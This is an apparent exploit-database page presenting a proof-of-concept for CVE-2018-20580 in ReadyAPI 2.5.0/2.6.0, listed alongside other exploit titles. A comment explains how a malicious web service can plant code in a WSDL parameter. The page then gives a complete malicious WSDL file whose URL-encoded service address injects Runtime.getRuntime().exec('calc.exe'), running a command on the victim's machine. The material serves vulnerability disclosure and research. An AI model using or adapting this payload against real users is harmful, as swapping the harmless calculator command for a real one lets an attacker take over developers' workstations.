Menu

Improved exploit search engine. Try it out

"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution"

Author

"Gilson Camelo"

Platform

multiple

Release date

2019-05-06

Release Date Title Type Platform Author
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Deluge 1.3.15 - 'URL' Denial of Service (PoC)" dos multiple "Victor Mondragón"
2019-05-13 "Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-05-10 "CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection" webapps multiple "Marcelo Toran"
2019-05-10 "TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery" webapps multiple "Alexandre Basquin"
2019-05-07 "Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting" webapps multiple alt3kx
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
2019-05-03 "Zotonic < 0.47.0 mod_admin - Cross-Site Scripting" webapps multiple "Ramòn Janssen"
2019-04-30 "Domoticz 4.10577 - Unauthenticated Remote Command Execution" webapps multiple "Fabio Carretto"
2019-04-24 "Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow" remote multiple "Google Security Research"
2019-04-22 "ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-04-22 "Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)" dos multiple "Bogdan Kurinnoy"
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-18 "Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)" dos multiple "Fakhri Zulkifli"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID" dos multiple "Google Security Research"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4" dos multiple "Google Security Research"
2019-04-09 "Apache Axis 1.4 - Remote Code Execution" remote multiple "David Yesland"
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2019-04-03 "Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion" remote multiple "Google Security Research"
2019-04-03 "Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion" dos multiple "Google Security Research"
2019-04-03 "Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46796/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46796/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46796/41235/readyapi-250-260-remote-code-execution/download/", "exploit_id": "46796", "exploit_description": "\"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution\"", "exploit_date": "2019-05-06", "exploit_author": "\"Gilson Camelo\"", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<!--
# Exploit Title: ReadyAPI Remote Code Execution Vulnerability.
# Date: May, 2019
# Exploit Author: Gilson Camelo => https://twitter.com/gscamelo
# Vendor Homepage: https://smartbear.com/product/ready-api
# Software Link: https://smartbear.com/product/ready-api/overview/
# Github: https://github.com/gscamelo/CVE-2018-20580
# Version: 2.5.0 and 2.6.0
# Tested on: Windows
# CVE : CVE-2018-20580

I found a new vulnerability in the (ReadyAPI). It allows an attacker to
execute a remote code on the local machine putting in danger the ReadyAPI
users including developers, pentesters, etc...

The ReadyAPI allows users to open a SOAP project and import WSDL files that
help the users to communicate with the remote server easily.

The WSDL file owner can determine default values of some parameters. An
attacker can impersonate a legitimate web service and inject a malicious
code into a default value of one of the parameters and spread it to
ReadyAPI clients.

When a ReadyAPI client load a malicious WSDL file to his project and send a
request containing the malicious code the ReadyAPI will execute the
malicious code on the victim's computer.

The attack scenario:

An attacker impersonates a regular web service with a WSDL containing the
malicious code.
The victim creates a new project in the ReadyAPI and loads the malicious
WSDL File.
The victim decides to send a request to the remote server and the ReadyAPI
execute the malicious code.
The attacker succeeds in executing malicious code in the victim's machine
and take it over.
-->

<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions
                xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
                xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
                xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
                xmlns:tns="http://example.com/stockquote.wsdl"
                xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
                xmlns:s="http://www.w3.org/2001/XMLSchema"
                xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
                targetNamespace="http://example.com/stockquote.wsdl"
                xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">

  <wsdl:types>
    <s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">
      <s:element name="Malicious_Request">
        <s:complexType>
          <s:sequence>
            <s:element name="Payload" default="PWNED" type="s:string" />
          </s:sequence>
        </s:complexType>
      </s:element>

    </s:schema>
  </wsdl:types>
  <wsdl:message name="Malicious_RequestSoapIn">
    <wsdl:part name="parameters" element="tns:Malicious_Request" />
  </wsdl:message>

  <wsdl:portType name="Exploit">
    <wsdl:operation name="Malicious_Request">
      <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>
      <wsdl:input message="tns:Malicious_RequestSoapIn" />
      <wsdl:output message="tns:Malicious_RequestSoapOut" />
    </wsdl:operation>
  </wsdl:portType>

  <wsdl:binding name="Exploit" type="tns:Exploit">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http" />
    <wsdl:operation name="Malicious_Request">
      <soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />
      <wsdl:input>
        <soap:body use="literal" />
      </wsdl:input>
      <wsdl:output>
        <soap:body use="literal" />
      </wsdl:output>
    </wsdl:operation>
  </wsdl:binding>

  <wsdl:service name="XPL">
    <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>
    <wsdl:port name="Exploit" binding="tns:Exploit">
      <soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />
    </wsdl:port>

  </wsdl:service>
</wsdl:definitions>